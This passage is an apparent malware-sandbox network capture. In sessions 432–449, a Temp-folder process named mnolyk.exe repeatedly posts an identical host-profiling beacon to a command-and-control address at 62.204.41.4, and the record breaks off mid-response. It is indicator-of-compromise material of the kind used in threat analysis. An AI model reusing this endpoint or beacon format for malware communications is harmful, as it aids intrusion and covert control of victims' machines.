                                                                      432 | 192.168.2.7 | 50127 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:58.089433908 CET | 547 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:58.156618118 CET | 547 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      433 | 192.168.2.7 | 50128 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:58.335870028 CET | 548 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:58.398947954 CET  548                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      434         192.168.2.7  50129        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:08:58.570310116 CET  549                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:58.633084059 CET  549                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      435         192.168.2.7  50130        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:08:58.812896967 CET  550                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:58.875322104 CET  550                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      436         192.168.2.7  50131        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:08:59.066086054 CET  551                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:59.130352020 CET  551                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      437         192.168.2.7  50132        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:08:59.313659906 CET  552                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:59.378097057 CET  552                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      438         192.168.2.7  50133        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:08:59.557976961 CET  553                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:59.622168064 CET  553                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      439         192.168.2.7  50134        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:08:59.789777040 CET  554                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:59.854084015 CET  554                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      44          192.168.2.7  49738        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:07:12.270874977 CET  148                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:12.334152937 CET  148                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      440         192.168.2.7  50135        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:00.033380032 CET  555                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:00.097311020 CET  555                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      441         192.168.2.7  50136        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:00.282670021 CET  556                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:00.346760988 CET  556                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      442         192.168.2.7  50137        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:00.524988890 CET  557                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:00.587641001 CET  557                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      443         192.168.2.7  50138        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:00.761131048 CET  558                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:00.826219082 CET  558                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      444         192.168.2.7  50139        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:01.006926060 CET  559                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:01.071893930 CET  559                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      445         192.168.2.7  50140        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:01.270108938 CET  560                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:01.334685087 CET  560                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      446         192.168.2.7  50141        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:01.548249006 CET  561                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:01.614281893 CET | 561 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      447 | 192.168.2.7 | 50142 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:01.792841911 CET | 562 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:01.858047009 CET | 562 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      448 | 192.168.2.7 | 50143 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:02.035666943 CET | 563 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:02.103218079 CET | 563 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      449 | 192.168.2.7 | 50144 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:02.280525923 CET | 564 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:02.344717026 CET | 564 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
